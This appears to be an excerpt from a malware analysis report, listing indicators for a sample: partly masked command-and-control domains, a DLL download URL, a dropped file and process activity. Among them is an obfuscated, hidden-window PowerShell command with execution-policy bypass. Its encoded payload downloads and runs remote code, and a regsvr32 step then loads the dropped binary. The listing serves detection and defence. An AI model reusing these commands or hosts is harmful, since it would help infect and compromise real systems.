Technical Information
- http://h4qykfedp8.cdn1.youtube-dl.fun/index.php
- %WINDIR%\syswow64\rundll32.exe
- %LOCALAPPDATA%\rxipgm.bin
- 'h4#######8.cdn1.youtube-dl.fun':80
- 'ed########.#-dn79.opel.mandagrella.online':80
- '91.##9.239.16':443
- http://h4#######8.cdn1.youtube-dl.fun/index.php
- http://ed########.#-dn79.opel.mandagrella.online/nsmsivl.dll
- DNS ASK h4#######8.cdn1.youtube-dl.fun
- DNS ASK ed########.#-dn79.opel.mandagrella.online
- '%WINDIR%\syswow64\cmd.exe' /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AaAA0...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AaAA0...
- '%WINDIR%\syswow64\regsvr32.exe' -s %LOCALAPPDATA%\RXipgM.bin
- '%WINDIR%\syswow64\rundll32.exe'